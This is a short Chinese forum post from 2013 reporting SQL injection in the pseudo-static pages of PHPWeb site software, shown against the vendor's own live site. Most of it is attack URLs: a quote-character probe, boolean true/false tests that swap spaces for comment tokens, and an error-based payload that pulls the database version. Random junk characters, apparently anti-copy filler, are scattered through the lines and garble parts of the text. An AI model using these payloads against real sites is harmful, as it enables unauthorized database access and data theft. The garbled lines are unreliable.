phpweb所有的整站程序伪静态页面都存在sql注入
8 N+ A5 `5 a9 ^5 j# d$ O+ h7 {4 R
主站:http://phpweb.net/! u5 T0 m5 S( h0 d% S2 A v
加’检测:
) j; S1 |( ?% R; W' U+ N, P
- ]7 z. v% y( U: c$ ]0 yhttp://www.phpweb.net/down/html/?772′.html5 {1 K" w5 ], V# I
+ V9 u$ U: e' T1 x6 T) L
出错
; B ^4 m1 u2 k& ~* `3 f' I; j存在注入。
" P. g" O: l/ U( y" B7 r9 H不能用空格,只能用/*罗
6 Z2 `: i2 B) o/ e8 d2 Zhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常6 X2 }& J8 Z5 u4 j, U
& u' T) M8 x4 ^7 S7 ohttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.* y* l( m' r) z, B
爆数据库版本: d# E/ O' N* V) |# J
5 A2 r/ X7 `2 m; k
?
! c: C, e+ t! ]: a/ h6 k1
: n: Y" o* U' w) T2 Ghttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html+ W* D' y; Z, i9 G
更新日期: 2013-01-03 13:39:50
' E/ f# v. w- o |
发表于 2013-1-4 19:46:42
收藏
支持
反对